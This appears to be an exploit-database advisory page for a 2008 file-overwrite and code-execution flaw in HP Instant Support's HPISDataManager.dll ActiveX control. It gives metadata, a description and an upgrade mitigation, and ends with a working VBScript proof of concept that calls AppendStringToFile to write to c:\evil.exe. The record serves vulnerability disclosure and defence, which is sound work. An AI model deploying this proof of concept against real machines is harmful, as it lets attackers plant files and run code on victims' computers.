header-logo
Suggest Exploit
vendor:
HP Instant Support
by:
SecurityFocus
9.3
CVSS
HIGH
Code Execution
94
CWE
Product Name: HP Instant Support
Affected Version From: HP Instant Support 1.0.0.22 and earlier versions
Affected Version To: HP Instant Support 1.0.0.22 and earlier versions
Patch Exists: YES
Related CWE: N/A
CPE: a:hewlett_packard:hp_instant_support
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

HP Instant Support ‘HPISDataManager.dll’ ActiveX Control Unspecified Code Execution Vulnerability

HP Instant Support 'HPISDataManager.dll' ActiveX control is prone to a vulnerability that lets attackers create and overwrite files with arbitrary, attacker-controlled content. Successful exploits may compromise affected computers and aid in further attacks. An attacker can exploit this issue by enticing an unsuspecting user to view a malicious web page. The attacker can then execute arbitrary code on the affected computer.

Mitigation:

Upgrade to HP Instant Support 1.0.0.23 or later.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/29535/info

HP Instant Support 'HPISDataManager.dll' ActiveX control is prone to a vulnerability that lets attackers create and overwrite files with arbitrary, attacker-controlled content.

Successful exploits may compromise affected computers and aid in further attacks.

HP Instant Support 1.0.0.22 and earlier versions are affected.

NOTE: This issue was previously covered in BID 29526 (HP Instant Support 'HPISDataManager.dll' ActiveX Control Unspecified Code Execution Vulnerabilities), but has been given its own record because of new information.

<?XML version='1.0' standalone='yes' ?> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' /> <script language='vbscript'> targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll" prototype = "Sub AppendStringToFile ( ByVal bstrInputFileName As String , ByVal bstrInputString As String )" memberName = "AppendStringToFile" progid = "HPISDataManagerLib.Datamgr" argCount = 2 arg1="c:\evil.exe" arg2=String("CSIS entered this") target.AppendStringToFile arg1 ,arg2 </script></job></package>